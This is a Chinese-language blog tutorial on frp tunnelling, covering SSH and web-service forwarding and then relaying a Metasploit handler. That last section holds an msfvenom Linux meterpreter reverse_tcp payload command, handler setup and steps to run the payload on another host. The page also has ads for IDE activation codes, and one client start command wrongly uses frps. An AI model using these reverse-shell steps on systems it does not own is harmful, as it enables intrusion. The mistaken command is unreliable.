Frp内网穿透

Frp内网穿透Frp内网穿透​ 内网穿透从本质上来讲也是端口映射,两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机,该情况多用于没有公网IP的情况下使用;​ frp是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务,支持tcp,udp,http,https等协议类型,可以将内网服务以安全、便捷的方式通过具有公网

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

Frp内网穿透

​ 内网穿透从本质上来讲也是端口映射,两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机,该情况多用于没有公网 IP 的情况下使用;

​ frp是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http, https等协议类型,可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网;

## 中文文档地址: 
https://gofrp.org/docs/ 
## github 下载地址: 
https://github.com/fatedier/frp/releases

​ Frp有客户端和服务端,根据所安装主机的系统下载好对应的版本,这里下载了两个版本,一个windows版本,一个linux版本;

1

1、映射内网SSH服务

​ 将linux版本文件通过xshell上传到云服务器,并进行解压;

## 解压文件
tar xf frp_0.33.0_linux_amd64.tar.gz

Snipaste_2021-09-24_17-17-59

## 文件涵义
frpc			客户端程序 
frpc_full.ini	客户端完整配置文件 
frpc.ini		客户端简易配置文件 
frps			服务端程序 
frps_full.ini	服务端完整配置文件 
frps.ini		服务端简易配置文件

​ 查看简易配置文件,配置了侦听端口为7000,即服务端与客户端通讯的端口;

Snipaste_2021-09-24_17-38-18

​ 启动服务端程序;

 ## 以简易配置启动服务端程序
 ./frps -c ./frps.ini 

Snipaste_2021-09-24_17-53-58

​ 在本地CentOS7中解压linux版本文件,并修改客户端简易配置文件frpc.ini;

Snipaste_2021-09-24_17-51-54

## 客户端简易配置文件frpc.ini
[common]
server_addr = 123.456.789.111     ## 远程云主机的公网ip地址
server_port = 7000                ## 服务端侦听的端口
[ssh] 
type = tcp 					## 协议类型					
local_ip = 127.0.0.1 		## 本地的ip地址
local_port = 22 			## 本地的端口
remote_port = 6000 			## 映射到服务端的端口

​ 启动客户端程序;

## 以简易配置启动客户端程序
./frpc -c frpc.ini

Snipaste_2021-09-24_18-11-58

​ 此时云主机上服务端会显示已经成功的日志信息;

Snipaste_2021-09-24_18-13-29

​ 在云主机上查看6000端口的状态,显示已经配置了TCP监听;

Snipaste_2021-09-24_18-22-33

​ 通过xshell访问云主机公网ip的6000端口就可以访问内网主机;

Snipaste_2021-09-24_18-38-51

Snipaste_2021-09-24_18-39-11

2、映射内网Web服务

​ 配置服务端的配置文件frps.ini,vhost_http_port为http服务访问端口,vhost_https_port为https服务访问端口,此处以http服务为例;

## frps.ini配置文件
[common]
bind_port = 7000
vhost_http_port = 8080

Snipaste_2021-09-24_21-36-24

​ 配置完成后启动服务端程序;

 ## 以简易配置启动服务端程序
 ./frps -c ./frps.ini 

​ 更改客户端的配置文件frpc.ini;

## frpc.ini配置文件
[common]
server_addr = 123.456.789.111   ## 云主机的公网IP
server_port = 7000				## 服务端绑定的端口

[web]
type = http
local_port = 80					## 本地Web服务的端口
custom_domains = www.yourdomain.com	 ## 解析到公网IP上的域名

Snipaste_2021-09-24_21-39-08

​ 启动客户端程序;

 ## 以简易配置启动客户端程序
 ./frps -c ./frps.ini 

Snipaste_2021-09-24_21-40-44

​ 服务端可以查看到成功链接的日志信息;

Snipaste_2021-09-24_21-42-28

​ 访问域名:8080就可以访问本地的Web服务;

Snipaste_2021-09-24_21-44-17

3、配置MSF接收来自公网的shell

​ 服务端配置文件不用改变,修改客户端配置文件即可,然后启动客户端程序;

## frpc.ini配置文件
[common]
server_addr = 123.456.789.111   ## 云主机的公网IP
server_port = 7000				## 服务端绑定的端口

[msf] 
type = tcp 
local_port = 4444 		## 本地待监听端口
local_ip = 127.0.0.1 
remote_port = 8085 		## 云主机映射端口

Snipaste_2021-09-24_22-11-30

Snipaste_2021-09-24_22-19-10

​ 生成 payload ,LHOST 指定为公网 IP,LPORT 指定为公网映射端口;

## 使用msfvenom生成payload
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=123.456.789.111 LPORT=8085 -b "\x00" -f elf -o xuyu 

Snipaste_2021-09-24_22-26-24

​ 本地启动 MSF 并配置侦听,此时监听LOST为本地ip地址,LPORT为frpc.ini配置文件中本地的端口;

## MSF配置本地监听
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp 
set LHOST 192.168.1.105
set LPORT 4444 
exploit 

Snipaste_2021-09-24_22-41-48
​ 将payload复制到另一台Centos中,并执行;

## 复制payload并执行
scp xuyu root@192.168.1.6:/root/
chmod +x xuyu
./xuyu

​ MSF 成功接收 shell ;

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/194252.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • CSS基础笔记——超链接样式

    CSS基础笔记——超链接样式在浏览器中,超链接默认情况下字体为蓝色,带有下划线,鼠标单击时字体为红色,单击后为紫色而在CSS中,我们可以使用超链接伪类来定义超链接在鼠标单击的不同时期的样式a:link{…}a:visited{…}a:hover{…}a:active{…}定义四个伪类,必须按照link、visited、hover、active的顺序进行,不然浏览器可能无法正常显示这四种样式<!DOCTYPEhtml><html><head&gt

  • git版本管理工具介绍(git管理工具有哪些)

    Git 是一个分布式版本控制工具,它的作者 LinusTorvalds是这样给我们介绍Git —— Thestupidcontenttracker(傻瓜式的内容跟踪器)1、Git背景Git最初由LinusTorvalds编写,用于Linux内核开发的版本控制工具。Git与常用的版本控制工具CVS、Subversion等不同,它采用了分布式版本库的方式,不必服务器端软

  • beanUtils.copy_拷贝板原理

    beanUtils.copy_拷贝板原理本文用实例介绍BeanUtils的拷贝原理。

  • Win10电脑计算机自己跑,Win10做了这9项优化 电脑运行急速提升「建议收藏」

    Win10电脑计算机自己跑,Win10做了这9项优化 电脑运行急速提升「建议收藏」想让系统更快些,就需要优化它。虽然和之前版本相比,Win10在底层性能上已经不错,但毕竟要照顾不同的使用人群,因此它的很多项目还是偏向于保守和大众化的。其实每个人使用Win10的目的都不同,有选择性地关闭一些服务,就可以让Win10跑得更快!装好Win10必做的优化1、替换自带WindowsDefender具体做法:安装第三方杀软,系统将自动关闭WindowsDefender;虽然微软一直在标榜自…

  • 查看linux内核版本号的方法_查看系统型号命令

    查看linux内核版本号的方法_查看系统型号命令小编给大家分享一下关于查看Linux系统版本、内核版本、查看Linux的IP地址以及Terminal终端最常用到的几个命令符:一、查看Linux系统版本(cat/etc/issue或者lsb_release-a)二、查看Linux内核版本命令(cat/proc/version或者uname-a)三、查看Linux的IP地址:四、常用命令:1、tab键命令补全2、cle…

    2022年10月10日
  • Idea快捷键大全(Windows)

    Idea快捷键大全(Windows)Ctrl快捷键 介绍 Ctrl+F 在当前文件进行文本查找(必备) Ctrl+R 在当前文件进行文本替换(必备) Ctrl+Z 撤销(必备) Ctrl+Y 删除光标所在行或删除选中的行(必备) Ctrl+X 剪切光标所在行或剪切选择内容 Ctrl+C 复制光标所在行或复制选择内容 …

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号